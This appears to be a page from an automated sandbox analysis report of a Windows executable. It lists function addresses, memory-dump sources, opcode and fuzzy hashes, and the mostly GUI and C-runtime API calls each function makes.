              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 013b28ff2e2cf5cc4f372b18ee661587455bc6b4868927df10088c12ebc6ca82
              • Instruction ID: d56623e139d74f6e53c2c4b437013fafd3d75d50d9d1c9e47c2875e4944e30ac
              • Opcode Fuzzy Hash: 013b28ff2e2cf5cc4f372b18ee661587455bc6b4868927df10088c12ebc6ca82
              • Instruction Fuzzy Hash: 4DE136745083849FC314CF29D49096ABBF0AB9E300F89099EF9D597352D735EA09DB62
              Function 00B93A3C Relevance: .3, Instructions: 263COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction ID: 9cc3bc8878f1afd36814e26c7238b5c3f4b599e6e6d7ccaba877870874e91348
              • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction Fuzzy Hash: F19145B02047498BDF24EF68D8D1BBE77E5EB90700F1009BEE597C7282DA74AA45C752
              Function 00BA4969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fb43c007f79b22801298eb8cf5b9993415b80807a61810c279d0669cc53c2c4
              • Instruction ID: 74169f61676d2fc391c63bd208fa30ac75ce42ef8cfaa8417493dad9de547831
              • Opcode Fuzzy Hash: 2fb43c007f79b22801298eb8cf5b9993415b80807a61810c279d0669cc53c2c4
              • Instruction Fuzzy Hash: D761777168C7086ADE389928C896BBF73C8EBC3700F500ADAE482DB281D7D1DD42C759
              Function 00B93D6D Relevance: .2, Instructions: 232COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction ID: f6e4ffb908bbac8305c8795b8d8743b8d6089cf00ec06f371c1852ac90cd23de
              • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction Fuzzy Hash: 79713C717047454BDF24DF28C8D0BAD77E5EB91B04F0049BDE5C78B282DA749A89C752
              Function 00BA473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
              • Instruction ID: 6b1c8b68036eb1998650b4a8bd357294bb1d2fe89d3b4ef624599a5833b69ce3
              • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
              • Instruction Fuzzy Hash: E5517A7060CBC46BDB3589689896BBF67C9DBD3300F1805D9E982D7282C3D9DE85C352
              Function 00B8DE6C Relevance: .2, Instructions: 190COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e9885d6305de041cdea2b53f8513b22b30c40ea7c1cf0021967d344d855e5beb
              • Instruction ID: 5c316f7f8391807c6d9bbf1c152b4bdd91192564f8860c15e009e8d0f590e00f
              • Opcode Fuzzy Hash: e9885d6305de041cdea2b53f8513b22b30c40ea7c1cf0021967d344d855e5beb
              • Instruction Fuzzy Hash: CC81AD9120D2E4AECB169F7D38E4AB53FE1573B201B1C00FA84C6872B3D9765598DB22
              Function 00B8E8A0 Relevance: .2, Instructions: 154COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e982bd5169c530e045a43cf7ad2cf60e27d8538962f2b968d5993b8bfd76b9e2
              • Instruction ID: ae722eea5da22d94f69ab95293c8f2446066932a5476105f2454fca070daaae6
              • Opcode Fuzzy Hash: e982bd5169c530e045a43cf7ad2cf60e27d8538962f2b968d5993b8bfd76b9e2
              • Instruction Fuzzy Hash: C751BF315083D64EC712DF24919446EBFE1BE9A714F4A48EEE4E55B222D330E749CBA2
              Function 00B8F968 Relevance: .1, Instructions: 131COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a45fa0594f7ec29d8928b3d180150b11f2066b210b095450e4a6502bdf6c5fc1
              • Instruction ID: 2824b84d325ff9e1506ff8a2bf5c092fe692b999e166a3dd19f3bf8b201c977f
              • Opcode Fuzzy Hash: a45fa0594f7ec29d8928b3d180150b11f2066b210b095450e4a6502bdf6c5fc1
              • Instruction Fuzzy Hash: 1E512671A083028BC748CF19D48055AF7E1FFC8354F058A2EE899A7740DB34E959CB96
              Function 00B937C1 Relevance: .1, Instructions: 112COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
              • Instruction ID: bf7ef8edf8a14f4557535c260b0eceb395dbc5d9fc354a7dfe125f4ac58bfa49
              • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
              • Instruction Fuzzy Hash: 5831F2B56147458FCB14EF28C89166ABBE0FB95700F10496EE4D9C7342C739EE49CB92
              Function 00B85F3C Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8fdff9a59e35ce121190287867f499d508fd8fb75822ca427a622bf9f5212856
              • Instruction ID: 642a8117299c5e42c3e1367781f723cbd51493ef7d306a7e9ba6cde8458cfda5
              • Opcode Fuzzy Hash: 8fdff9a59e35ce121190287867f499d508fd8fb75822ca427a622bf9f5212856
              • Instruction Fuzzy Hash: DC21FF31A201614BCB58DF2DDCD087A7791D74A311746826BFF46CB2E1C934F925CB90
              Function 00B8DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
              Download Yara Rule
              APIs
              • _swprintf.LIBCMT ref: 00B8DABE
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
                • Part of subcall function 00B91596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BC0EE8,00000200,00B8D202,00000000,?,00000050,00BC0EE8), ref: 00B915B3
              • _strlen.LIBCMT ref: 00B8DADF
              • SetDlgItemTextW.USER32(?,00BBE154,?), ref: 00B8DB3F
              • GetWindowRect.USER32(?,?), ref: 00B8DB79
              • GetClientRect.USER32(?,?), ref: 00B8DB85
              • GetWindowLongW.USER32(?,000000F0), ref: 00B8DC25
              • GetWindowRect.USER32(?,?), ref: 00B8DC52
              • SetWindowTextW.USER32(?,?), ref: 00B8DC95
              • GetSystemMetrics.USER32(00000008), ref: 00B8DC9D
              • GetWindow.USER32(?,00000005), ref: 00B8DCA8
              • GetWindowRect.USER32(00000000,?), ref: 00B8DCD5
              • GetWindow.USER32(00000000,00000002), ref: 00B8DD47
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              • Opcode ID: 86d61daf3179ab4b262846e2ba8b692583e636420bc69e1a0a7432566e914740
              • Instruction ID: c7f0b7ec90fabab974f0362f18e7a9bd527768f9893eb50108c7b047db4fc3ef
              • Opcode Fuzzy Hash: 86d61daf3179ab4b262846e2ba8b692583e636420bc69e1a0a7432566e914740
              • Instruction Fuzzy Hash: D4819171108341AFD710EF68CD89E6BBBE9EB88704F05096DFA84A72A1D670E905CB52
              Function 00BAC233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___free_lconv_mon.LIBCMT ref: 00BAC277
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE2F
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE41
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE53
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE65
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE77
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE89
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE9B
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABEAD
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABEBF
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABED1
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABEE3
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABEF5
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABF07
              • _free.LIBCMT ref: 00BAC26C
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BAC28E
              • _free.LIBCMT ref: 00BAC2A3
              • _free.LIBCMT ref: 00BAC2AE
              • _free.LIBCMT ref: 00BAC2D0
              • _free.LIBCMT ref: 00BAC2E3
              • _free.LIBCMT ref: 00BAC2F1
              • _free.LIBCMT ref: 00BAC2FC
              • _free.LIBCMT ref: 00BAC334
              • _free.LIBCMT ref: 00BAC33B
              • _free.LIBCMT ref: 00BAC358
              • _free.LIBCMT ref: 00BAC370
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 012c3cfe5a3267db4640652ad42a2b9ac334845a8b13b53864846e18b6d818e5
              • Instruction ID: 9a1fc17a4164fcf0da58df831c864f590f3b192c8b5ac511cafcedcb4ab3aac5
              • Opcode Fuzzy Hash: 012c3cfe5a3267db4640652ad42a2b9ac334845a8b13b53864846e18b6d818e5
              • Instruction Fuzzy Hash: 24319D326083059FEF20AA78D945B9B7BEAFF06310F1484AAE459D7A51DF71EC40CB24
              Function 00B9CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
              Download Yara Rule
              APIs
              • GetWindow.USER32(?,00000005), ref: 00B9CD51
              • GetClassNameW.USER32(00000000,?,00000800), ref: 00B9CD7D
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00B9CD99
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B9CDB0
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9CDC4
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B9CDED
              • DeleteObject.GDI32(00000000), ref: 00B9CDF4
              • GetWindow.USER32(00000000,00000002), ref: 00B9CDFD
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 3820355801-1882779555
              • Opcode ID: 27978d40916f9276c13fd6bdedc17436404b2942daf0b7ea22847ba52e08d5b4
              • Instruction ID: b9f9374e684f3ca65ec6964a64375a80af0889f631f422b7050c3107bceafb56
              • Opcode Fuzzy Hash: 27978d40916f9276c13fd6bdedc17436404b2942daf0b7ea22847ba52e08d5b4
              • Instruction Fuzzy Hash: 32112732140750BBEA216B64DC8AFAF3ADCEF44741F004474FA02A60D2CE648A0596A5
              Function 00BA8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00BA8EC5
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BA8ED1
              • _free.LIBCMT ref: 00BA8EDC
              • _free.LIBCMT ref: 00BA8EE7
              • _free.LIBCMT ref: 00BA8EF2
              • _free.LIBCMT ref: 00BA8EFD
              • _free.LIBCMT ref: 00BA8F08
              • _free.LIBCMT ref: 00BA8F13
              • _free.LIBCMT ref: 00BA8F1E
              • _free.LIBCMT ref: 00BA8F2C
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 091900b096ce12e2fc2fdecf9b3f5955ab4eddcd53609eb0f7edba4b99690a96
              • Instruction ID: 689e94929311c33c723e5ea1276d9b60dd18460c8dc42415a7aea9b7daacd4b3
              • Opcode Fuzzy Hash: 091900b096ce12e2fc2fdecf9b3f5955ab4eddcd53609eb0f7edba4b99690a96
              • Instruction Fuzzy Hash: 3811A27650410DAFDB11FF94C842CDA3BA6FF0A350B5180E5BA088BA66DE31EA519B80
              Function 00B82162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              • Opcode ID: 0354ccd59fcae1b863aa06fa1589cbef77e7dfa3095bed685f6a7b8f080bffb1
              • Instruction ID: 35964e2f04664b1f9017dd15fbff241e4eda1270de42ca467cc3e8e24c51ebc0
              • Opcode Fuzzy Hash: 0354ccd59fcae1b863aa06fa1589cbef77e7dfa3095bed685f6a7b8f080bffb1
              • Instruction Fuzzy Hash: 53F1E4B16042405BDB15FF348895BEE7BD5AF90300F0805F9FD859B2A6EB649C48C7B2
              Function 00B9ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • EndDialog.USER32(?,00000001), ref: 00B9AD20
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B9AD47
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B9AD60
              • SetWindowTextW.USER32(?,?), ref: 00B9AD71
              • GetDlgItem.USER32(?,00000065), ref: 00B9AD7A
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B9AD8E
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B9ADA4
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              • Opcode ID: 7fe7d47924dab0d69bf7f19ba67547ab9471aaf956857bc3e524588de34db990
              • Instruction ID: 8c34a8268eace266a917c7b9b43af8dde7deafb056378e70eaca72b90d6c87db
              • Opcode Fuzzy Hash: 7fe7d47924dab0d69bf7f19ba67547ab9471aaf956857bc3e524588de34db990
              • Instruction Fuzzy Hash: 4021B431244205BBE6256F25ED8AE3B3FECEF4AB46F050075F604AB4A1DF519901D672
              Function 00B89443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
              Download Yara Rule
              APIs
              • __EH_prolog.LIBCMT ref: 00B89448
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B8946B
              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B8948A
